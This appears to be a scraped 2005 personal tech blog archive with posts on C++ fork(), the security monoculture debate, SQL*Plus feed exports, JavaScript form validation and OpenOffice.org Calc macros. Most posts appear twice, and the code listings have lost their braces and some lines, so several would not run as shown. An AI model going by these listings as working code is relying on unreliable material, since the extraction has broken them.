Hello folks,
I am still around, I've just been taking a long vacation. I have some more articles waiting to be written, I have just been lazy during my time off. In the mean time, I want to wish everyone a Happy New Year.
Saturday, December 31, 2005
Wednesday, December 21, 2005
Several months ago, I got very interested in Linux processes, socket programming, and IPC. While I was very familiar with the concepts themselves, I had never actually written programs that utilized them. In this article, I will look at the simpler of the topics, using the Linux fork() function to generate a new process.
fork() is surprisingly easy to use. Simply make a call to fork, and you have a new process. The return from fork() is the process ID of the child ID. In the child process, the returned value is 0. This makes storing the returned value from fork necessary to determine while process is active. For example, if I have this function call:
pid = fork();
pid in the parent process will be assigned the value of the child process ID, and inside the child process, pid will be assigned 0. I really thought there would be more to it, but in a nutshell, that is basically it. Below is an example program. The program will fork a process. The parent will count to 100 by 2, starting at 0, and the child will count to 101 starting at 1. Both will display to the same console, so the output will need to identify itself as the child or parent process. The example was compiled with GCC under Cygwin with no problems.
//Two C headers needed for the process ID type and the system calls to fork processes
#include <sys/types.h>
#include <unistd.h>
//I prefer the C++ style IO over the C style
#include <iostream>
//Needed to call IOSTREAM in the standard namespace without prefix
using namespace std;
int main()
//variable to store the forked process ID
pid_t process_id;
//counter to be used in the loops
int counter;
//Fork the process ID, and if there is an error, exit the program with an error
process_id = fork();
if (process_id < 0)
cerr << "Process failed to create!" << endl;
//If the process ID is not 0, it is the parent process. The parent process will counter from 0 to 100 and increment
//by two each time. The child process will have a process_id of 0, and increment by 2 starting from 1.
if (process_id)
//Let the user know what the parent ID is and the generated child ID
cout << "I am the parent ID. My PID is: " << getpid() << " and my Childs process ID is " << process_id << endl;
for (counter = 0; counter <= 100; counter += 2)
cout << "Parent (" << getpid() << "): " << counter << endl;
//Tell the user what the current process ID is using getpid to verify it is the child process, then show
//that process_id is 0
cout << "I am the Child ID " << getpid() << " and I think the assigned process ID is " << process_id << endl;
for (counter = 1; counter <= 101; counter += 2)
cout << "Child(" << getpid() << "): " << counter << endl;
return 0;
Being able to spawn separate processes is incredible useful in handling multiple connection in a server program. Sharing variables between multiple processes gets really interesting. This is where the various IPC methods come in to play, but that’s for another article.
fork() is surprisingly easy to use. Simply make a call to fork, and you have a new process. The return from fork() is the process ID of the child ID. In the child process, the returned value is 0. This makes storing the returned value from fork necessary to determine while process is active. For example, if I have this function call:
pid = fork();
pid in the parent process will be assigned the value of the child process ID, and inside the child process, pid will be assigned 0. I really thought there would be more to it, but in a nutshell, that is basically it. Below is an example program. The program will fork a process. The parent will count to 100 by 2, starting at 0, and the child will count to 101 starting at 1. Both will display to the same console, so the output will need to identify itself as the child or parent process. The example was compiled with GCC under Cygwin with no problems.
//Two C headers needed for the process ID type and the system calls to fork processes
#include <sys/types.h>
#include <unistd.h>
//I prefer the C++ style IO over the C style
#include <iostream>
//Needed to call IOSTREAM in the standard namespace without prefix
using namespace std;
int main()
//variable to store the forked process ID
pid_t process_id;
//counter to be used in the loops
int counter;
//Fork the process ID, and if there is an error, exit the program with an error
process_id = fork();
if (process_id < 0)
cerr << "Process failed to create!" << endl;
//If the process ID is not 0, it is the parent process. The parent process will counter from 0 to 100 and increment
//by two each time. The child process will have a process_id of 0, and increment by 2 starting from 1.
if (process_id)
//Let the user know what the parent ID is and the generated child ID
cout << "I am the parent ID. My PID is: " << getpid() << " and my Childs process ID is " << process_id << endl;
for (counter = 0; counter <= 100; counter += 2)
cout << "Parent (" << getpid() << "): " << counter << endl;
//Tell the user what the current process ID is using getpid to verify it is the child process, then show
//that process_id is 0
cout << "I am the Child ID " << getpid() << " and I think the assigned process ID is " << process_id << endl;
for (counter = 1; counter <= 101; counter += 2)
cout << "Child(" << getpid() << "): " << counter << endl;
return 0;
Being able to spawn separate processes is incredible useful in handling multiple connection in a server program. Sharing variables between multiple processes gets really interesting. This is where the various IPC methods come in to play, but that’s for another article.
Tuesday, December 20, 2005
Classic Physics produces similar Cryptography to Quantum, or so they say..
Thanks to Linuxsecurity.com for their post about this Wired article. Quantum-like cryptography for half the price using run of the mill physics seems like a really cool concept, even if the concept is a little over my head. Using the noise present in resistors seems sound in theory, but even resistors at the same Ohm value slightly differ, causing the noise generated on each side to slightly differ (very minute amount) so I am assuming there is a slight margin for error. Based on the papers, it doesn’t look like they have a practical application of this yet, but it’s a pretty cool-sounding idea if it actually works. Maybe someone a little more knowledgeable in physics can explain this…
Monday, December 19, 2005
My thoughts on Monoculture
As an avid reader of both of Tom Ptacek and Richard Bejtlichs blogs, I think these two may need to be separated to avoid further disruption of the rest of the class. These guys never agree on anything, kind of like the Siskel and Ebert of computer security (or is that Roper now…) All kidding aside, both sides of the argument are correct and have their merits, and at the same time, neither are the final, correct answer. Let me explain my view on this.
First, let me give you the Cliffs Notes version of this debate. It is a widely known fact that the monopoly held by Microsoft Windows on the desktop market is a security nightmare due to the number of vulnerabilities, speed of disclosure and time to market for security updates. This brought up the debate about a single platform everyone uses being a security weakness both for individuals and for national security. This lack of diversity in the market is being labeled as a “Monoculture” (although I think I am going to use this term to refer to the skanky one-night stands at bars, it seems more appropriate). In Dan Geers article “Monoculture on the Back of the Envelope”, he is arguing for diversity of platforms, which I will label as a “Polyculture”, for the IT industry.
The “Monoculture” has several advantages, which is what makes it so popular. First, is standardization. Ideally, all systems in the environment are running on the same platform and have the same software. It is very easy to administer a network with a standard desktop image and similar software. Time to rollout administrative policies, software updates, and security fixes are minimized in this type of environment. The downside to this is if there is an exploit for vulnerability on this platform, the intruder basically has the keys to the kingdom.
The “Polyculture” on the other hand, limits this. In a “Polyculture”, a vulnerability on one single platform can be contained and only affects the vulnerable systems. However, as Halvar Flake points out (which I would normally discount as invalid due to the arrogance of his tone, but I will ignore and count as a valid point anyway) if there is a valuable piece of information, such as the source to Company A software package, distributed on different platforms, an intruder only needs to exploit one vulnerable platform to have access to that valuable piece of information. So if the goal of the intruder is to get that valuable piece of information, this paradigm is severely flawed. Also, once one system is owned, it is only a matter of time before a skilled intruder can research and exploit the diverse platforms, making the intruder not only a bigger threat to the compromised organization, but other organizations as well.
So here are my thoughts on this. I believe there is very little evidence to credit a “Monoculture” as a major security weakness or strength for all scenarios. In some scenarios, such as Halvar’s example, it can be a potential strength. In other examples, such as with worms, it is a major detriment. I believe a “Polyculture” is a natural evolution from a “Monoculture”, and is more than likely a Windows shop diversifying into a Windows/Linux/MacOS shop. Therefore, chances are that the weakest link in the chain more than likely is a vulnerability in the software that exists in the “Monoculture” as well as the “Polyculture” since that vulnerable system will exist in both environments. The whole “Monoculture” argument is smoke and mirrors, another example of security through obscurity by diversifying the environment, another example of the argument of sacrificing usability vs. security, and a chance for someone to write a “paper” to get a new buzzword out there for us to all argue about. Both sides have their pros and their cons, leading to the conclusion that once again, security researchers have created a ruckus and have failed to find that security “silver bullet”, distracting us from the real issues of piss-poor security policies, piss-poor management, and failure to communicate risk effectively to management. The concept of diversifying the environment is just another tool in the security toolkit, and may not be appropriate for all scenarios. A well-managed Windows only network will be just as secure as a hybrid network consisting of multiple platforms; the only difference is the increased difficulty in management.
My final thoughts on this, this seems to me like a thinly veiled argument to “ditch Windows in favor of authors favorite platform X, but start slow and only do a few systems at a time”. If you don’t like Windows, don’t use it, but don’t make up these ridiculous arguments about IT cultural diversity and complain about how only 30 percent of the laptops you see at conferences are Macs, just call it what it is.
Update (12-20-2005): Thomas Ptacek updated his post and just about hit the nail on the head as far as I am concerned. “But the problem with the monoculture argument is that it simply isn't real” is absolutly, 100 percent, right on the money. The monoculture argument is an argument that is best left out of the security equation and left more to the management to decide the best path to productivity (example: Mac for the graphic artists, PC’s for the programmers, *nix for the servers, etc). And kudos for going one step further and pointing out that there are other “Monocultures” out there.
First, let me give you the Cliffs Notes version of this debate. It is a widely known fact that the monopoly held by Microsoft Windows on the desktop market is a security nightmare due to the number of vulnerabilities, speed of disclosure and time to market for security updates. This brought up the debate about a single platform everyone uses being a security weakness both for individuals and for national security. This lack of diversity in the market is being labeled as a “Monoculture” (although I think I am going to use this term to refer to the skanky one-night stands at bars, it seems more appropriate). In Dan Geers article “Monoculture on the Back of the Envelope”, he is arguing for diversity of platforms, which I will label as a “Polyculture”, for the IT industry.
The “Monoculture” has several advantages, which is what makes it so popular. First, is standardization. Ideally, all systems in the environment are running on the same platform and have the same software. It is very easy to administer a network with a standard desktop image and similar software. Time to rollout administrative policies, software updates, and security fixes are minimized in this type of environment. The downside to this is if there is an exploit for vulnerability on this platform, the intruder basically has the keys to the kingdom.
The “Polyculture” on the other hand, limits this. In a “Polyculture”, a vulnerability on one single platform can be contained and only affects the vulnerable systems. However, as Halvar Flake points out (which I would normally discount as invalid due to the arrogance of his tone, but I will ignore and count as a valid point anyway) if there is a valuable piece of information, such as the source to Company A software package, distributed on different platforms, an intruder only needs to exploit one vulnerable platform to have access to that valuable piece of information. So if the goal of the intruder is to get that valuable piece of information, this paradigm is severely flawed. Also, once one system is owned, it is only a matter of time before a skilled intruder can research and exploit the diverse platforms, making the intruder not only a bigger threat to the compromised organization, but other organizations as well.
So here are my thoughts on this. I believe there is very little evidence to credit a “Monoculture” as a major security weakness or strength for all scenarios. In some scenarios, such as Halvar’s example, it can be a potential strength. In other examples, such as with worms, it is a major detriment. I believe a “Polyculture” is a natural evolution from a “Monoculture”, and is more than likely a Windows shop diversifying into a Windows/Linux/MacOS shop. Therefore, chances are that the weakest link in the chain more than likely is a vulnerability in the software that exists in the “Monoculture” as well as the “Polyculture” since that vulnerable system will exist in both environments. The whole “Monoculture” argument is smoke and mirrors, another example of security through obscurity by diversifying the environment, another example of the argument of sacrificing usability vs. security, and a chance for someone to write a “paper” to get a new buzzword out there for us to all argue about. Both sides have their pros and their cons, leading to the conclusion that once again, security researchers have created a ruckus and have failed to find that security “silver bullet”, distracting us from the real issues of piss-poor security policies, piss-poor management, and failure to communicate risk effectively to management. The concept of diversifying the environment is just another tool in the security toolkit, and may not be appropriate for all scenarios. A well-managed Windows only network will be just as secure as a hybrid network consisting of multiple platforms; the only difference is the increased difficulty in management.
My final thoughts on this, this seems to me like a thinly veiled argument to “ditch Windows in favor of authors favorite platform X, but start slow and only do a few systems at a time”. If you don’t like Windows, don’t use it, but don’t make up these ridiculous arguments about IT cultural diversity and complain about how only 30 percent of the laptops you see at conferences are Macs, just call it what it is.
Update (12-20-2005): Thomas Ptacek updated his post and just about hit the nail on the head as far as I am concerned. “But the problem with the monoculture argument is that it simply isn't real” is absolutly, 100 percent, right on the money. The monoculture argument is an argument that is best left out of the security equation and left more to the management to decide the best path to productivity (example: Mac for the graphic artists, PC’s for the programmers, *nix for the servers, etc). And kudos for going one step further and pointing out that there are other “Monocultures” out there.
Friday, December 16, 2005
Export Oracle Delimeted Text Files
A question that has come up a few times recently is how to output Oracle data to delimited text file for a file transfer. There are a number of third party tools that do this sort of thing, and Oracle does not offer a tool directly for doing this, however SQL*Plus can be used for this purpose quite effectively. The Command Line version of SQL*Plus is the best option for this since it can easily be scripted in my opinion.
My preferred method is to create a text file with the commands to generate the feed, and pipe them in to SQL*Plus, redirecting the output to the file to be transferred. For example, lets say we need to generate a feed with 3 simple fields, an Employee ID, a date stamp, and a category identifier. The file I will create will look like this:
set linesize 120;
set feedback off;
set HEADING off; --optional flag set, explained below
set pagesize 0;
EMPID || '|' || to_char(datestamp, ‘dd-mmm-yyyy’) || '|' || category
The field delimiter in the above example is set to the pipe character. This can easily be changed by editing the query. I typically use pipe since it is not commonly used in the data fields that I normally work with. This script can be run from either a DOS prompt or from within a batch file using the following command:
type above_file.sql | sqlplus -s user/password@database_name > output_file.txt
Some people will suggest spooling the output file rather than redirecting, however I prefer redirecting from the standard output due to the flexibility offered by using command line tools, such as those supplied by Cygwin (my preference for a GNU port to Windows). For example, lets say “set pagesize 0”, which will remove the column headings, was omitted from the above script. While “Set heading off” will remove the wording, an extra blank line will be included in the feed. If I wanted to eliminate the additional blank lines where the column heading would be, I could pipe the results into the “strings” command to remove the blank lines. I actually receive feeds like this, so it is a useful tip to keep in mind when processing feeds as well as generating them. Another example is if I wanted to do a cheap and dirty sort by piping into the “sort” command. This is especially useful if you are on a restricted system with no access to the original SQL file to modify the query itself to add an “order by” clause.
I highly recommend installing Cygwin to supplement Windows to help with your automated feed process if a dedicated *nix system is not available. The tools offered by Cygwin are very robust and flexible for scripting. For example the Unix date command is much more powerful than its DOS/Windows counterpart. If I want to append the run date to the end of the feed file name, it is a trivial task. Below is an example for a DOS batch file using the above script:
c:\cygwin\bin\bash -c "/usr/bin/cat /cygdrive/c/auto_rpt/etc/above_file.sql | sqlplus -s user/password@database_name > /cygdrive/c/auto_rpt/feed_archive/above_file/`/usr/bin/date +%%F`_ output_file.txt"
(Note: In the above command, the two percent signs are necessary inside of a DOS Batch file. On a regular command prompt, eliminate one of the percent signs. I always use full paths inside of automated scripts to operate under the assumption that the same PATH statements differ between my automated scripts account and my general user accounts. Not including the full paths has been the source of a number of headaches for several developers I have worked with in the past, so I try not to fall into the same pitfall whenever possible. There are a few other tips for using Cygwin in scripting feeds and file transfers, but I will save them for another article.)
My preferred method is to create a text file with the commands to generate the feed, and pipe them in to SQL*Plus, redirecting the output to the file to be transferred. For example, lets say we need to generate a feed with 3 simple fields, an Employee ID, a date stamp, and a category identifier. The file I will create will look like this:
set linesize 120;
set feedback off;
set HEADING off; --optional flag set, explained below
set pagesize 0;
EMPID || '|' || to_char(datestamp, ‘dd-mmm-yyyy’) || '|' || category
The field delimiter in the above example is set to the pipe character. This can easily be changed by editing the query. I typically use pipe since it is not commonly used in the data fields that I normally work with. This script can be run from either a DOS prompt or from within a batch file using the following command:
type above_file.sql | sqlplus -s user/password@database_name > output_file.txt
Some people will suggest spooling the output file rather than redirecting, however I prefer redirecting from the standard output due to the flexibility offered by using command line tools, such as those supplied by Cygwin (my preference for a GNU port to Windows). For example, lets say “set pagesize 0”, which will remove the column headings, was omitted from the above script. While “Set heading off” will remove the wording, an extra blank line will be included in the feed. If I wanted to eliminate the additional blank lines where the column heading would be, I could pipe the results into the “strings” command to remove the blank lines. I actually receive feeds like this, so it is a useful tip to keep in mind when processing feeds as well as generating them. Another example is if I wanted to do a cheap and dirty sort by piping into the “sort” command. This is especially useful if you are on a restricted system with no access to the original SQL file to modify the query itself to add an “order by” clause.
I highly recommend installing Cygwin to supplement Windows to help with your automated feed process if a dedicated *nix system is not available. The tools offered by Cygwin are very robust and flexible for scripting. For example the Unix date command is much more powerful than its DOS/Windows counterpart. If I want to append the run date to the end of the feed file name, it is a trivial task. Below is an example for a DOS batch file using the above script:
c:\cygwin\bin\bash -c "/usr/bin/cat /cygdrive/c/auto_rpt/etc/above_file.sql | sqlplus -s user/password@database_name > /cygdrive/c/auto_rpt/feed_archive/above_file/`/usr/bin/date +%%F`_ output_file.txt"
(Note: In the above command, the two percent signs are necessary inside of a DOS Batch file. On a regular command prompt, eliminate one of the percent signs. I always use full paths inside of automated scripts to operate under the assumption that the same PATH statements differ between my automated scripts account and my general user accounts. Not including the full paths has been the source of a number of headaches for several developers I have worked with in the past, so I try not to fall into the same pitfall whenever possible. There are a few other tips for using Cygwin in scripting feeds and file transfers, but I will save them for another article.)
Thursday, December 15, 2005
Javascript Input Validation
Previously I had written about input validation in ASP .Net. Since then, I have had a few inquiries regarding input validation using basic JavaScript. In this article I will give a simple example using JavaScript to validate a form input to allow only numbers. First, a warning. Do not rely on Client Side Validation as the only form of input validation for any application. Client side validation can easily be circumvented, causing undesirable results in your application, and lead to possible exploitation in this design vulnerability. Always have some server side validation routine to work with client side validation at the very least, even in a trusted environment.
The goal here is to have a simple form field, with 2 regular un-validated text inputs and 1 validated text inputs. Any non-numeric characters entered into the form field will be cause the Submit action to fail. Validations will only take place on submit to avoid annoying the user with alert boxes on every key press. The code is below
<title>Javascript Form Validation with Regular Expression Test</title>
<script language="JavaScript" type="text/JavaScript">
//Function to validate the input
function validate()
//If anything in our string is not a number, fail validation
if (!document.form1.input_field.value.match(/^\d+$/))
//Let the user know they put in bad input, and give focus to the
//field to be corrected
alert('invalid input, only numbers allowed');
document.form1.input_field.value = "";
//Return false
return false;
return true;
<!-- This is the form to be validated, it has two BS text fields (we do not validate), and one
field that will be validated, specify the validation function as the submit action -->
<form name="form1" method="post" action="" onSubmit="return validate();">
BS Field
<input type="text" name="textfield1">
BS Field
<input type="text" name="textfield2">
Important field
<input name="input_field" type="text">
<input type="submit" name="Submit" value="Submit">
Very simple. Of course, more complex validations can take place using better regular expressions. For example, thanks to a thread on the Regular Expression Library, the above example can be modified to validate Social Security Numbers using regular expressions in JavaScript. The modified validate function is below:
//Function to validate the input
function validate()
//If anything in our string is not a number, fail validation
if (!document.form1.input_field.value.match(/^(?!000)(?!588)(?!666)(?!69[1-9])(?!73[4-9]|7[4-5]\d|76[0123])([0-6]\d{2}|7([0-6]\d|7[012]))([ -])?(?!00)\d\d\3(?!0000)\d{4}$/))
//Let the user know they put in bad input, and give focus to the
//field to be corrected
alert('Invalid SSN format');
document.form1.input_field.value = "";
//Return false
return false;
return true;
The goal here is to have a simple form field, with 2 regular un-validated text inputs and 1 validated text inputs. Any non-numeric characters entered into the form field will be cause the Submit action to fail. Validations will only take place on submit to avoid annoying the user with alert boxes on every key press. The code is below
<title>Javascript Form Validation with Regular Expression Test</title>
<script language="JavaScript" type="text/JavaScript">
//Function to validate the input
function validate()
//If anything in our string is not a number, fail validation
if (!document.form1.input_field.value.match(/^\d+$/))
//Let the user know they put in bad input, and give focus to the
//field to be corrected
alert('invalid input, only numbers allowed');
document.form1.input_field.value = "";
//Return false
return false;
return true;
<!-- This is the form to be validated, it has two BS text fields (we do not validate), and one
field that will be validated, specify the validation function as the submit action -->
<form name="form1" method="post" action="" onSubmit="return validate();">
BS Field
<input type="text" name="textfield1">
BS Field
<input type="text" name="textfield2">
Important field
<input name="input_field" type="text">
<input type="submit" name="Submit" value="Submit">
Very simple. Of course, more complex validations can take place using better regular expressions. For example, thanks to a thread on the Regular Expression Library, the above example can be modified to validate Social Security Numbers using regular expressions in JavaScript. The modified validate function is below:
//Function to validate the input
function validate()
//If anything in our string is not a number, fail validation
if (!document.form1.input_field.value.match(/^(?!000)(?!588)(?!666)(?!69[1-9])(?!73[4-9]|7[4-5]\d|76[0123])([0-6]\d{2}|7([0-6]\d|7[012]))([ -])?(?!00)\d\d\3(?!0000)\d{4}$/))
//Let the user know they put in bad input, and give focus to the
//field to be corrected
alert('Invalid SSN format');
document.form1.input_field.value = "";
//Return false
return false;
return true;
Tuesday, December 13, 2005
More OpenOffice.org Macros
While waiting for an excessively long Oracle script to run, I had more time to play around with OpenOffice.org Macros. Have I mentioned how bad the documentation is for OpenOffice? Personally I have very little gripe with OO outside of its incomplete documentation for developers, however some people take their complaints a little further (I agree with a lot of what this guy is saying). I would like to thank Andrew Pitonyak for all his help on the code to select a whole row, and the documentation provided from his site that helped me figure out how to search a document for a value, as well as talking about the undocumented SearchType property used in my example. The below is along the same lines as my previous delete range example, it will search an OpenOffice.org Calc spreadsheet for a matching value and delete the row.
The code is below:
Sub FindAndDeleteRowWithMatch()
Dim oSheet as object
dim oRow as object
dim oCell as object
Dim oDescriptor as object
Dim oFound as object
'Get the first sheet in the active document
oSheet = ThisComponent.getSheets().getByIndex(0)
''Create the search descriptor to searcht eh document
oDescriptor = oSheet.createSearchDescriptor()
'Set the text for which to search and other
With oDescriptor
.SearchString = "100" 'Search for the formula result value of 100
.SearchWords = True 'Search the whole cell, not just part of it
.SearchCaseSensitive = False 'Do not be case sensitive
.SearchType = 1 'Search for values, not just formulas. This is an undocumented property
End With
'Get the first result from the search
oFound = oSheet.findFirst(oDescriptor)
'If the object is not null or empty, process, otherwise, do not process
if IsEmpty(oFound) or IsNull(oFound) then
print "Not Found"
'Get the row with the result in it
oRow = oFound.getRows().getByIndex(0)
'Select the row
'Delete the row from the worksheet
osheet.removeRange(oRow.RangeAddress, com.sun.star.sheet.CellDeleteMode.UP)
'Inform the user that the row was deleted
print "Found and Deleted"
end if
End Sub
This is great, but I decided to extend this just a tad bit more. I wanted to have the same sort of macro as illustrated in my article about the Excel Macro to delete the non-matches from a VLOOKUP. The macro will search the spreadsheet for all values from a VLOOKUP where there is no match and the returned result is “#N/A”. However I ran into an interesting problem. OpenOffice.org does not consider the “#N/A” result from a VLOOKUP a value, so you cannot search for it, nor does it provide a function to search by error codes. This made things a little difficult. Thanks to Andrew Pitonyaks documentation, I was easily able to find a macro that will select a whole sheet as a range, and go through cell by cell to find the matching error code for the “#N/A” value and delete the target row. In the below example I have a simple sheet with a few values, and a VLOOKUP function to compare against the values in another sheet.

Below is the code based off of the macro found in Andrew Pitonyaks documentation (thanks to Gerrit Jasper for providing the original code).
sub FindNAandDelete()
Dim nCurCol As Integer
Dim nCurRow As Integer
Dim nEndCol As Integer
Dim nEndRow As Integer
Dim oCell As Object
Dim oCursor As Object
Dim aAddress As Variant
Dim iFind As integer
dim oSheet as object
'This is the error value for N/A when a VLOOKUP cannot find a value
const NA_VALUE as integer = 32767
'Get the first sheet in the active document
oSheet = ThisComponent.getSheets().getByIndex(0)
'Select the range to search
oCell = oSheet.GetCellbyPosition( 0, 0 )
oCursor = oSheet.createCursorByRange(oCell)
aAddress = oCursor.RangeAddress
nEndRow = aAddress.EndRow
nEndCol = aAddress.EndColumn
For nCurCol = 0 To nEndCol 'Go through the range column by column,
For nCurRow = 0 To nEndRow 'row by row.
'Get the current cell, then assign its error value
oCell = oSheet.GetCellByPosition( nCurCol, nCurRow )
iFind = oCell.getError()
'If the value matches the NA Value, then we have a match, select and delete the row
If iFind = NA_VALUE then
oRow = oCell.getRows().getByIndex(0)
'Select the row
'delete the selected row
osheet.removeRange(oRow.RangeAddress, com.sun.star.sheet.CellDeleteMode.UP)
'Go back 1 row so we do not miss any values
nCurRow = nCurRow - 1
End If
End sub
Below is a screenshot of the sheet after the macro was run.

As you can see, it removed all the rows with “#N/A”. While it is not as efficient as I would like, it does do the job. So far, I have found that OO is definitely workable, albeit a little frustrating to work with. Thanks to community support, however, I have not run into an issue yet that I have not been able to work around.
The code is below:
Sub FindAndDeleteRowWithMatch()
Dim oSheet as object
dim oRow as object
dim oCell as object
Dim oDescriptor as object
Dim oFound as object
'Get the first sheet in the active document
oSheet = ThisComponent.getSheets().getByIndex(0)
''Create the search descriptor to searcht eh document
oDescriptor = oSheet.createSearchDescriptor()
'Set the text for which to search and other
With oDescriptor
.SearchString = "100" 'Search for the formula result value of 100
.SearchWords = True 'Search the whole cell, not just part of it
.SearchCaseSensitive = False 'Do not be case sensitive
.SearchType = 1 'Search for values, not just formulas. This is an undocumented property
End With
'Get the first result from the search
oFound = oSheet.findFirst(oDescriptor)
'If the object is not null or empty, process, otherwise, do not process
if IsEmpty(oFound) or IsNull(oFound) then
print "Not Found"
'Get the row with the result in it
oRow = oFound.getRows().getByIndex(0)
'Select the row
'Delete the row from the worksheet
osheet.removeRange(oRow.RangeAddress, com.sun.star.sheet.CellDeleteMode.UP)
'Inform the user that the row was deleted
print "Found and Deleted"
end if
End Sub
This is great, but I decided to extend this just a tad bit more. I wanted to have the same sort of macro as illustrated in my article about the Excel Macro to delete the non-matches from a VLOOKUP. The macro will search the spreadsheet for all values from a VLOOKUP where there is no match and the returned result is “#N/A”. However I ran into an interesting problem. OpenOffice.org does not consider the “#N/A” result from a VLOOKUP a value, so you cannot search for it, nor does it provide a function to search by error codes. This made things a little difficult. Thanks to Andrew Pitonyaks documentation, I was easily able to find a macro that will select a whole sheet as a range, and go through cell by cell to find the matching error code for the “#N/A” value and delete the target row. In the below example I have a simple sheet with a few values, and a VLOOKUP function to compare against the values in another sheet.

Below is the code based off of the macro found in Andrew Pitonyaks documentation (thanks to Gerrit Jasper for providing the original code).
sub FindNAandDelete()
Dim nCurCol As Integer
Dim nCurRow As Integer
Dim nEndCol As Integer
Dim nEndRow As Integer
Dim oCell As Object
Dim oCursor As Object
Dim aAddress As Variant
Dim iFind As integer
dim oSheet as object
'This is the error value for N/A when a VLOOKUP cannot find a value
const NA_VALUE as integer = 32767
'Get the first sheet in the active document
oSheet = ThisComponent.getSheets().getByIndex(0)
'Select the range to search
oCell = oSheet.GetCellbyPosition( 0, 0 )
oCursor = oSheet.createCursorByRange(oCell)
aAddress = oCursor.RangeAddress
nEndRow = aAddress.EndRow
nEndCol = aAddress.EndColumn
For nCurCol = 0 To nEndCol 'Go through the range column by column,
For nCurRow = 0 To nEndRow 'row by row.
'Get the current cell, then assign its error value
oCell = oSheet.GetCellByPosition( nCurCol, nCurRow )
iFind = oCell.getError()
'If the value matches the NA Value, then we have a match, select and delete the row
If iFind = NA_VALUE then
oRow = oCell.getRows().getByIndex(0)
'Select the row
'delete the selected row
osheet.removeRange(oRow.RangeAddress, com.sun.star.sheet.CellDeleteMode.UP)
'Go back 1 row so we do not miss any values
nCurRow = nCurRow - 1
End If
End sub
Below is a screenshot of the sheet after the macro was run.

As you can see, it removed all the rows with “#N/A”. While it is not as efficient as I would like, it does do the job. So far, I have found that OO is definitely workable, albeit a little frustrating to work with. Thanks to community support, however, I have not run into an issue yet that I have not been able to work around.
Tuesday, December 06, 2005
First Foray into OpenOffice.org Macro Programming
I have begun working with OpenOffice.org 2.0 macros, and all I have to say is “ouch”, my first experience was not a positive one. I do have a couple of macros that do their intended purpose, but I also have one hell of a headache. I love OpenOffice, it is a great product, but its macro facilities have a long way to go before being considered prime time. The biggest problem is the lack of documentation for any of their objects. While http://api.openoffice.org/ has an API reference, it is cumbersome to find information, forcing you to use the search feature. It is not quite the reference at my fingertips that it should be. This experience has not deterred me from learning how to develop for OpenOffice however, but I do have some major gripes. Thankfully I came across websites of people who have been down this road before, which somewhat got me started in the right direction.
-OpenOffice Basic Macro for Calc (the guy has a few macros for demonstration, he seems to agree about the documentation)
-OpenOffice Tips (probably the first site I found that helped me get a handle on accessing basic things like Cells access)
-Excel VBA to Calc/StarBasic
-OpenOffice API Homepage
My intended goal was to write macros that would do simple tasks first, so the macro I wrote is for Calc and will select a range and delete it. This will work for deleting rows and columns. Below are two different versions, one will simply clear the contents, and the other will delete the range.
Clear the range:
Sub clear_range
'Generic objects for selecting the current document,
'worksheet, and storing the range
Dim oDoc As Object
Dim oSheet As Object
Dim oRange As Object
'Integer for setting the various attributes to clear values
Dim iCellAttr As Integer
'Set all attributes for clearing
iCellAttr = _
com.sun.star.sheet.CellFlags.VALUE + _
com.sun.star.sheet.CellFlags.DATETIME + _
com.sun.star.sheet.CellFlags.STRING + _
com.sun.star.sheet.CellFlags.ANNOTATION + _
com.sun.star.sheet.CellFlags.FORMULA + _
com.sun.star.sheet.CellFlags.HARDATTR + _
com.sun.star.sheet.CellFlags.STYLES + _
com.sun.star.sheet.CellFlags.OBJECTS + _
'Set the current documents
'Get the sheet to clear the range, then select that range and clear
'Clear the range based on the attributes set to clear
End Sub
Delete the range:
Sub delete_range
'Generic objects for selecting the current document,
'worksheet, and storing the range
Dim oDoc As Object
Dim oSheet As Object
Dim oRange As Object
'Set the current documents
'Get the sheet to clear the range, then select that range and clear
‘Delete the range
osheet.removeRange(oRange.RangeAddress, com.sun.star.sheet.CellDeleteMode.UP)
End Sub
I could not find a easier way to select rows or columns other than to select a large range of cells, so if you know of one, please share.
If you are setting out to do some work with OpenOffice.org macro facilities, be sure to keep plenty of patience handy, because your going to need it.
Update: I found this very useful document on Andrew Pitonyak website. He is the author of OpenOffice.org Macros Explained. Apparently this document was not up at the time of this writing. But I found tons of useful information in it. Thanks Andrew for posting it.
-OpenOffice Basic Macro for Calc (the guy has a few macros for demonstration, he seems to agree about the documentation)
-OpenOffice Tips (probably the first site I found that helped me get a handle on accessing basic things like Cells access)
-Excel VBA to Calc/StarBasic
-OpenOffice API Homepage
My intended goal was to write macros that would do simple tasks first, so the macro I wrote is for Calc and will select a range and delete it. This will work for deleting rows and columns. Below are two different versions, one will simply clear the contents, and the other will delete the range.
Clear the range:
Sub clear_range
'Generic objects for selecting the current document,
'worksheet, and storing the range
Dim oDoc As Object
Dim oSheet As Object
Dim oRange As Object
'Integer for setting the various attributes to clear values
Dim iCellAttr As Integer
'Set all attributes for clearing
iCellAttr = _
com.sun.star.sheet.CellFlags.VALUE + _
com.sun.star.sheet.CellFlags.DATETIME + _
com.sun.star.sheet.CellFlags.STRING + _
com.sun.star.sheet.CellFlags.ANNOTATION + _
com.sun.star.sheet.CellFlags.FORMULA + _
com.sun.star.sheet.CellFlags.HARDATTR + _
com.sun.star.sheet.CellFlags.STYLES + _
com.sun.star.sheet.CellFlags.OBJECTS + _
'Set the current documents
'Get the sheet to clear the range, then select that range and clear
'Clear the range based on the attributes set to clear
End Sub
Delete the range:
Sub delete_range
'Generic objects for selecting the current document,
'worksheet, and storing the range
Dim oDoc As Object
Dim oSheet As Object
Dim oRange As Object
'Set the current documents
'Get the sheet to clear the range, then select that range and clear
‘Delete the range
osheet.removeRange(oRange.RangeAddress, com.sun.star.sheet.CellDeleteMode.UP)
End Sub
I could not find a easier way to select rows or columns other than to select a large range of cells, so if you know of one, please share.
If you are setting out to do some work with OpenOffice.org macro facilities, be sure to keep plenty of patience handy, because your going to need it.
Update: I found this very useful document on Andrew Pitonyak website. He is the author of OpenOffice.org Macros Explained. Apparently this document was not up at the time of this writing. But I found tons of useful information in it. Thanks Andrew for posting it.
Monday, December 05, 2005
Secure Programming - C/C++ Strings
